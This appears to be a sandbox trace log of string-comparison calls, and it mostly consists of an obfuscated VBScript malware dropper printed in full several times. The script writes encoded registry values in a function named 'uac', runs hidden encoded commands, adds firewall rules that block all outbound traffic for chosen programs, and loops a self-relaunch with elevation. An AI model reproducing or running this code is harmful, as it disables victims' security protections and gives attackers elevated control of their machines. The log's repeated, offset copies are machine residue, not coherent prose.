bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.318] wcsncmp (_String1="nction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.318] wcsncmp (_String1="ction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.318] wcsncmp (_String1="tion criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.319] wcsncmp (_String1="ion criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.319] wcsncmp (_String1="on criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = 